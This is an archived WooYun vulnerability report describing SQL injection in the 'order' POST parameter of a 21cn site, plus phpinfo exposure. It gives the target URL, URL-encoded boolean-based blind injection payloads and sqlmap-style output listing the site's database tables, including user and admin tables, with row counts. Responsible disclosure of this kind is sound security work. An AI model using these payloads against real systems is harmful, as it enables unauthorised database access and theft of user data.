当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112923

漏洞标题:世纪龙某站SQL注射&phpinfo信息泄露

相关厂商:世纪龙信息网络有限责任公司

漏洞作者: 路人甲

提交时间:2015-05-11 10:01

修复时间:2015-06-25 11:10

公开时间:2015-06-25 11:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-11: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

233

详细说明:

http://ts.21cn.com:80/home/morepost (POST)
order=1&pages=0
参数:order
payload
order=1%2c(select%20case%20when%20(3*2*1%3d6%20AND%20000776%3d000776)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)%3d1

漏洞证明:

Parameter: order (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: order=(SELECT (CASE WHEN (1056=1056) THEN 1056 ELSE 1056*(SELECT 1056 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pages=0
---
web application technology: Nginx
back-end DBMS: MySQL 5.0
Database: jutousu
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| iic_user                       | 73834   |
| iic_reply                      | 43953   |
| iic_digg                       | 41251   |
| iic_log                        | 32647   |
| iic_post_sync                  | 15150   |
| iic_user_addres                | 14712   |
| iic_digg_20131224              | 13041   |
| iic_post                       | 12630   |
| iic_post_com                   | 8575    |
| iic_reply_sync                 | 6180    |
| iic_area                       | 3407    |
| iic_collective_digg            | 1831    |
| iic_access                     | 917     |
| iic_com                        | 753     |
| iic_recom                      | 641     |
| iic_collective_reply           | 591     |
| iic_case                       | 586     |
| iic_merchant                   | 350     |
| iic_node                       | 271     |
| iic_captcha                    | 226     |
| iic_ipadmin                    | 96      |
| iic_feedback                   | 93      |
| iic_movice                     | 87      |
| iic_redblackdigg               | 73      |
| iic_collective                 | 70      |
| iic_postkeyword                | 66      |
| iic_cat                        | 61      |
| iic_reply_link                 | 60      |
| iic_collectivetimeline         | 59      |
| iic_hotpost                    | 42      |
| iic_role_account               | 39      |
| iic_team                       | 37      |
| iic_collectivenews             | 33      |
| iic_wxuser                     | 32      |
| iic_account                    | 30      |
| iic_specialcolumn              | 27      |
| iic_collectiveslide            | 26      |
| iic_proc                       | 24      |
| iic_redblacklist               | 24      |
| iic_article                    | 13      |
| iic_collectiveweibo            | 11      |
| iic_admin                      | 8       |
| iic_keyword                    | 7       |
| iic_role                       | 6       |
| iic_ip                         | 4       |
| iic_experttype                 | 3       |
| iic_post_dealwith_satisfaction | 3       |
| iic_arc                        | 2       |
| iic_wbsync                     | 2       |
| iic_filter                     | 1       |
+--------------------------------+---------+


phpinfo
还开启了危险模式。。。

s20150508174033.png

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-11 11:09

厂商回复:

感谢您对我们业务安全的关注,根据您的报告,问题已着手处理,谢谢。

最新状态:

暂无